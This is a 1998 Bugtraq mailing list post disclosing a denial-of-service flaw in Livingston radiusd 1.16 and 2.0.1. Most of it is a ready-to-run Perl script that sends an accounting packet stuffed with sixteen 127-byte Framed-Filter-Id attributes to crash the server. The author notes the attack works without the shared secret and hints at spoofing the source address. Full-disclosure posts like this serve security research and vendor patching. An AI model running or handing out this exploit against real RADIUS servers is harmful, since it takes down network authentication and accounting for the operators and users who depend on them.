Bugtraq mailing list archives

code to crash radiusd

From: hamdi.tounsi () ati tn (Hamdi Tounsi)
Date: Wed, 15 Apr 1998 08:38:32 -0100


--35897.31267.41812
Content-Type: text/plain


Hi all
the following will crash radiusd from livingston, 1.16 and 2.0.1 97/5/22 (the
latest version)
i alerted livingston a few months ago ... a bugfix should be available now
one important thing is that you dont need the shared secret between the radius
server and its clients to be able to crash it, since the accounting server
will try to log the accounting request (though it will flag it as unverified)
of course you need to be listed in the clients config file to be able to send an accounting request. otherwise spoof ;)

--hamdi


#!/usr/bin/perl
use Authen::RadiusAcct;
$r = new Authen::RadiusAcct(Host => 'your.radius.server:1646', Secret => 'any_string');
$r->load_dictionary;
$r->add_attributes(
        {Name => 'User-Name', Value => 'anyuser'},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
        );
$r->send_packet(4);
}

--35897.31267.41812--

Current thread:

Symlink problem (Tested only on a Digital Unix 4.0) root (Apr 06)
- Re: Symlink problem (Tested only on a Digital Unix 4.0) Jonathan A. Zdziarski (Apr 06)
- <Possible follow-ups>
- Re: Symlink problem (Tested only on a Digital Unix 4.0) Paul Szabo (Apr 06)
  - Re: Symlink problem (Tested only on a Digital Unix 4.0) John McDonald (Apr 07)